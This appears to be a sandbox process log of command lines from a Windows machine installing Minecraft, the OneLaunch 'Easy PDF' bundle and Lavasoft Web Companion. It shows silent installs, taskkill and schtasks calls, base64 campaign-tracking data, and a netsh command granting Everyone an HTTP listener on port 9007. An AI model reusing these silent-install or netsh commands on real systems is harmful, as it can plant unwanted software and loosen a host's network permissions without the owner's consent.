"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3444 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6104 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5128 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --mojo-platform-channel-handle=5088 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5416 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5428 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\MinecraftInstaller.exe
"C:\Users\Admin\Downloads\MinecraftInstaller.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --mojo-platform-channel-handle=7156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=7084 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3156 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6608 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6376 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6768 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
"C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe"
C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JN5DD.tmp\OneLaunch - Easy PDF_3x8a5.tmp" /SL5="$1201F6,2173635,893952,C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe"
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --mojo-platform-channel-handle=6664 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --mojo-platform-channel-handle=6948 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6052 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=1752 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe
"C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe" /PDATA=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiTm9uZSIsInNwbGl0IjoiYiIsIm9sX3BsdXNfdjIiOmZhbHNlLCJub19zcGxpdCI6ZmFsc2UsInNwbGl0MiI6ImEiLCJzZXJ2ZXJfc2lkZV9zcGxpdF8yM18wNl9yb3VuZGVkX3NlYXJjaGJhciI6InZhcmlhdGlvbiIsInNwbGl0XzIyXzEyX21vcmVfZWR1Y2F0aW9uYWxfbWluaXByb21wdHMiOiJjb250cm9sIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJ2YXJpYXRpb24iLCJlbmNvZGVkX3NwbGl0cyI6IjAwMCJ9 /LAUNCHER /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\is-PBFUT.tmp\OneLaunch - Easy PDF_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-PBFUT.tmp\OneLaunch - Easy PDF_3x8a5.tmp" /SL5="$1E005E,2173635,893952,C:\Users\Admin\Downloads\OneLaunch - Easy PDF_3x8a5.exe" /PDATA=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiTm9uZSIsInNwbGl0IjoiYiIsIm9sX3BsdXNfdjIiOmZhbHNlLCJub19zcGxpdCI6ZmFsc2UsInNwbGl0MiI6ImEiLCJzZXJ2ZXJfc2lkZV9zcGxpdF8yM18wNl9yb3VuZGVkX3NlYXJjaGJhciI6InZhcmlhdGlvbiIsInNwbGl0XzIyXzEyX21vcmVfZWR1Y2F0aW9uYWxfbWluaXByb21wdHMiOiJjb250cm9sIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJ2YXJpYXRpb24iLCJlbmNvZGVkX3NwbGl0cyI6IjAwMCJ9 /LAUNCHER /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe
"C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe" /PDATA=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiTm9uZSIsInNwbGl0IjoiYiIsIm9sX3BsdXNfdjIiOmZhbHNlLCJub19zcGxpdCI6ZmFsc2UsInNwbGl0MiI6ImEiLCJzZXJ2ZXJfc2lkZV9zcGxpdF8yM18wNl9yb3VuZGVkX3NlYXJjaGJhciI6InZhcmlhdGlvbiIsInNwbGl0XzIyXzEyX21vcmVfZWR1Y2F0aW9uYWxfbWluaXByb21wdHMiOiJjb250cm9sIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJ2YXJpYXRpb24iLCJlbmNvZGVkX3NwbGl0cyI6IjAwMCJ9
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --mojo-platform-channel-handle=6608 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --mojo-platform-channel-handle=5596 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp
"C:\Users\Admin\AppData\Local\Temp\is-0CG1L.tmp\OneLaunch Setup_3x8a5.tmp" /SL5="$9020E,98167063,893952,C:\Users\Admin\AppData\Local\Temp\OneLaunch Setup_3x8a5.exe" /PDATA=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiTm9uZSIsInNwbGl0IjoiYiIsIm9sX3BsdXNfdjIiOmZhbHNlLCJub19zcGxpdCI6ZmFsc2UsInNwbGl0MiI6ImEiLCJzZXJ2ZXJfc2lkZV9zcGxpdF8yM18wNl9yb3VuZGVkX3NlYXJjaGJhciI6InZhcmlhdGlvbiIsInNwbGl0XzIyXzEyX21vcmVfZWR1Y2F0aW9uYWxfbWluaXByb21wdHMiOiJjb250cm9sIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJ2YXJpYXRpb24iLCJlbmNvZGVkX3NwbGl0cyI6IjAwMCJ9
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im onelaunch.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im chromium.exe
C:\Windows\SysWOW64\taskkill.exe
"C:\Windows\System32\taskkill.exe" /f /im onelaunchtray.exe
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --mojo-platform-channel-handle=6036 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5480 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5096 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7204 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=1136 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7260 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Users\Admin\Downloads\Setup_WebCompanion.exe
"C:\Users\Admin\Downloads\Setup_WebCompanion.exe"
C:\Users\Admin\AppData\Local\Temp\7zS477B1A6F\WebCompanionInstaller.exe
.\WebCompanionInstaller.exe --savename=Setup_WebCompanion.exe --partner=IN220101 --nonadmin --direct --tych --campaign=18022583703 --version=11.904.0.689
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=73 --mojo-platform-channel-handle=1048 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=74 --mojo-platform-channel-handle=6244 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3340 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=6976 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C netsh http add urlacl url=http://+:9007/ user=Everyone
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "OneLaunchLaunchTask" /F
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "ChromiumLaunchTask" /F
C:\Windows\SysWOW64\netsh.exe
netsh http add urlacl url=http://+:9007/ user=Everyone
C:\Windows\system32\schtasks.exe
"schtasks" /Delete /TN "OneLaunchUpdateTask" /F
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn OneLaunchLaunchTask /f
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn ChromiumLaunchTask /f
C:\Windows\system32\schtasks.exe
"schtasks" /delete /tn OneLaunchUpdateTask /f
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\onelaunch.exe" /l /startedFrom=installer
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wsappx -p -s AppXSvc
C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe
"C:\Users\Admin\AppData\Roaming\Lavasoft\Web Companion\Application\WebCompanion.exe" --install --geo=
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --start-maximized --tab-trigger=Launch
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\OneLaunch\User Data\Crashpad" --annotation=plat=Win32 --annotation=prod=OneLaunch --annotation=ver=112.1.0 --initial-client-data=0x294,0x298,0x29c,0x270,0x2a0,0x6cb2f098,0x6cb2f0a8,0x6cb2f0b4
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\OneLaunch\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\OneLaunch\User Data\Crashpad" --annotation=plat=Win32 --annotation=prod=OneLaunch --annotation=ver=112.1.0 --initial-client-data=0x2cc,0x2d0,0x2d4,0x2a8,0x2d8,0x59adb0,0x59adc0,0x59adcc
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:2
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=3040 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2328 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=utility --utility-sub-type=chrome.mojom.ProfileImport --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3544 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=77 --mojo-platform-channel-handle=2532 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --mojo-platform-channel-handle=3356 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 3248 -ip 3248
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3248 -s 2720
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --mojo-platform-channel-handle=7632 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=7696 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\program files\google\chrome\application\chrome.exe
"C:\program files\google\chrome\application\chrome.exe" "https://geteasypdf.com/pdf/thanks/?data=eyJ1dG1fdGVybSI6Ind3dy53aXpjYXNlLmNvbSIsImdjbGlkIjoiRUFJYUlRb2JDaE1JcDR1QWwtS3FnQU1WRnZVWkNoMVlUZ0h5RUFFWUFTQUFFZ0t4ZVBEX0J3RSIsInV0bV9jYW1wYWlnbiI6IjE3NDI4MDEwMDg2IiwiZGlzdGluY3RfaWQiOiI5ZDcwMmU5MS1jYTQ3LTRhNTEtOTk3OS04NDM3Y2ZhNmZkNzEiLCJ1dG1fbWVkaXVtIjoiMTQ3OTYxMTc0NzI5IiwicHJvZmlsZSI6InBkZiIsInR5cGUiOiJwZGZyZWFkZXIiLCJ1YSI6IkNocm9tZSIsIndoaXRlbGFiZWwiOiJlYXN5cGRmIiwidXRtX3NvdXJjZSI6Im9oLWdkbiIsInV0bV9jb250ZW50IjoiNjY2MTY3NzQ3OTQ2IiwiaW5zdGFsbF90aW1lIjoxNjkwMzE5MzQ4LCJkZWZhdWx0X2Jyb3dzZXIiOiJNU0VkZ2VIVE0iLCJpbml0aW5hbF92ZXJzaW9uIjoiNS4xNy40LjAiLCJwYWNrYWdlZF9icm93c2VyIjoiY2hyb21pdW0iLCJzcGxpdCI6ImIiLCJvbF9wbHVzX3YyIjpmYWxzZSwibm9fc3BsaXQiOmZhbHNlLCJzcGxpdDIiOiJhIiwic2VydmVyX3NpZGVfc3BsaXRfMjNfMDZfcm91bmRlZF9zZWFyY2hiYXIiOiJ2YXJpYXRpb24iLCJzcGxpdF8yMl8xMl9tb3JlX2VkdWNhdGlvbmFsX21pbmlwcm9tcHRzIjoidmFyaWF0aW9uIiwic3BsaXRfMjNfMDZfcHJlcGluX2xhYmVsbGVkX2FtYXpvbl9hcHAiOiJjb250cm9sIiwiZW5jb2RlZF9zcGxpdHMiOiIwMDAifQ=="
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4168 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe
"C:\Users\Admin\AppData\Local\OneLaunch\5.17.4\chromium\chromium.exe" --type=renderer --instant-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=4192 --field-trial-handle=2188,i,14150321953504742357,16382527469301661525,131072 /prefetch:1
C:\program files\google\chrome\application\chrome.exe
"C:\program files\google\chrome\application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0x11c,0x120,0x124,0x100,0x128,0x7fff9a469758,0x7fff9a469768,0x7fff9a469778
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5912 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --display-capture-permissions-policy-allowed --enable-chrome-cart --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --mojo-platform-channel-handle=7944 --field-trial-handle=1920,i,2950334911723628717,3168970873131766872,131072 /prefetch:1
